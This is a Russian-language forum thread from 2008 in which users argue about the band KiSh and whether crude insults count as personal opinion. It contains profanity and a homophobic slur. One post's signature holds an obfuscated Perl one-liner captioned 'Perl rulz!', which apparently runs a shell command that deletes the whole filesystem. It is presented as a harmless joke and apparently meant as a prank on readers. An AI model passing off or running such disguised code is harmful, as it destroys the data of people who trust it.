это моё мнение, я никому его не пропогандирую
ну что уж тут поделаешь. хотя песни есть неплохие,под гитару попеть
но слушать я их не могу и никогда не могла, были такие времена, когда они оч популярные были, так сейчас многие из тех, кто тогда с торбами и в футболках киша ходили их обсирают жестко, это относится к комплексу "взросления личности". у меня такое мнение о них и в шестом классе было, и оно не изменилось. _________________ Freedom's just another word for nothin' left to lose.
Добавлено: Вт Авг 19, 2008 12:12 am Заголовок сообщения:
Денис писал(а):
Ну да, зачем вот так обсирать разом, надо быть толерантнее, сдержанее что-ли, а то разом Гавно и не ебёт.
Ну,м? какбе все здесь в?ражаем собственное мнение и уже к этому привыкли.То есть,если кто-то говорит напрмер "киш-говно",то он подразумевает "я считаю,что киш-говно,но если кто-то считает иначе-это его право" и мы все это понимаем. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вт Авг 19, 2008 1:37 am Заголовок сообщения:
А ни кто и непротив, просто тебе понравится если твоего самого-самого любимого испонителя, я назову говном, и скажу это моё мнение, имею блять право, а потом добавлю что он пидарас, и ебёт коня, и опять подмечу это моё мнение.
По моему очевидно, что такие вещи задевают людей. Хочешь грубить, груби, но сам и не обижайся.
Добавлено: Вт Авг 19, 2008 8:26 am Заголовок сообщения:
?тот спор мне напомнил спор про Дарона, мудак он или нет. Конечно нет, но я ж не обижаюсь на то тчто ктото его так називает. У нас тут личное мнение. _________________ Купил казак Мамай видак,
крутил его и так, и сяк.
Морали в этой басне нету,
купил видак - купи касету!
если твоего самого-самого любимого испонителя, я назову говном, и скажу это моё мнение, имею блять право, а потом добавлю что он пидарас, и ебёт коня, и опять подмечу это моё мнение.
Может я аномалия,но меня это не заденет. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
и да _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Денис будет разочарован. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Ну скажем так, у каждого есть своя слабость, вот укажи на неё, как-нидь негативно, но в "доходчивой форме", так реакция последует незамдлетильно, а всё потому что человек эмоциональное существо. Я проверял этот паттерн поведения неоднократно. Кстати где-то здесь на форуме много таких примеров.